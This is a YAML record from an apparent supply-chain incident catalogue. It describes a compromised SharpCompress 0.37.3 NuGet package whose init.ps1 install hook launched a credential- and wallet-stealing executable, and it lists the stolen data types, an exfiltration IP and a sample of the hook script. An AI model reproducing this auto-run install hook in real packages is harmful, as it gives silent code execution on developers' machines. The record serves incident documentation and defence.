- name: SharpCompress
  title: Malicious SharpCompress NuGet package targets developers.
  start_date: 2024-12-18 # Approximate publish date of malicious version
  end_date: 2024-12-19 # Approximate removal/unlisting date
  license: MIT
  website: https://github.com/adamhathcock/sharpcompress
  repo: https://github.com/adamhathcock/sharpcompress
  attribution_type: unknown
  component_type: Library
  lang: C# # Payload language
  cause: compromise # Suspected NuGet account takeover
  motive: credential theft / code execution / espionage
  attack_vector: account takeover # NuGet publishing credentials suspected
  transitive: false
  insertion_phase: distribution # Malicious package published to NuGet
  impact_type: credential theft / remote code execution
  impact_user_count: 1000 # Conservative estimate based on short timeframe
  references:
    - https://www.bleepingcomputer.com/news/security/malicious-sharpcompress-nuget-package-targets-net-developers/
    - https://github.com/adamhathcock/sharpcompress/issues/774 # Maintainer's issue report
    - https://jfrog.com/blog/nuget-package-sharpcompress-compromised-in-supply-chain-attack/ # Detailed analysis
  versions:
    - "0.37.3"
  artifacts:
    - "NuGet package SharpCompress version 0.37.3 (Malicious, now unlisted/removed)"
  impacted_hashes: # SHA256 of the malicious nupkg
    - "2213163a16648681483d457670e81a455c5514c0c26d7be95209b51f4d8a1237"
  synopsis: A malicious version (0.37.3) of the popular SharpCompress NuGet package was published, likely via account takeover. The malicious package contained an info-stealer executable run during installation.
  compromise_desc: An attacker published a malicious version (`0.37.3`) of the legitimate `SharpCompress` package to the official NuGet repository around December 18th, 2024. This replaced the legitimate package, indicating a likely compromise of the maintainer's NuGet publishing credentials or account. The malicious NuGet package included an extra executable (`uncompress.exe`) within its `tools` directory and an `init.ps1` script designed to execute this file upon package installation in Visual Studio.
  impact_desc: Developers using Visual Studio who installed or updated to the malicious `SharpCompress` version 0.37.3 would execute `uncompress.exe` via the `init.ps1` PowerShell script during the package installation process. This executable acted as a sophisticated information stealer, collecting hostname, username, IP address, OS version, running processes, and actively searching for sensitive files like cryptocurrency wallets (Exodus, Atomic, Electrum, etc.), browser data (cookies, history, logins from Chrome, Firefox, Edge, etc.), VPN configurations (NordVPN, OpenVPN), messaging app data (Telegram, Signal), FTP client credentials (FileZilla, WinSCP), and SSH keys. The collected data was exfiltrated to an attacker-controlled server (`hxxp://172.107.239.150/upload`).
  example_code: |
    # Content of tools/init.ps1 in the malicious SharpCompress 0.37.3 nupkg

    param($installPath, $toolsPath, $package, $project)

    # Executes the embedded malicious executable 'uncompress.exe'
    # This runs in the context of the user installing the package via Visual Studio PM Console
    Start-Process -FilePath "$toolsPath\uncompress.exe"
